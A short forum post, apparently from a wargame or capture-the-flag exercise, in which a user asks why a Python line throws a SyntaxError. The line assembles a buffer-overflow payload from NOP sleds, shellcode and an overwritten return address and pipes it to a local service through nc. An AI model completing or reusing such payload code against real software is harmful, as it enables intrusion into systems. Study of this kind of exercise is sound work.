• We’re currently investigating an issue related to the forum theme and styling that is impacting page layout and visual formatting. The problem has been identified, and we are actively working on a resolution. There is no impact to user data or functionality, this is strictly a front-end display issue. We’ll post an update once the fix has been deployed. Thanks for your patience while we get this sorted.

Python syntax compile error

JC0133

Senior member
I am trying to figure out why I keep getting an error here


<code>
os.system('echo \"' + '\x90'*(buffer/2 - len(shellCode)/2)+shellCode+'\x90'*(buffer/2 - len(shellCode)/2)+eip '\" | nc localhost ' + port)


File "./level8Testscript2", line 23
os.system('echo \"' + '\x90'*(buffer/2 - len(shellCode)/2)+shellCode+'\x90'*(buffer/2 - len(shellCode)/2)+eip '\" | nc localhost ' + port)
^
SyntaxError: invalid syntax
</code>
 
Back
Top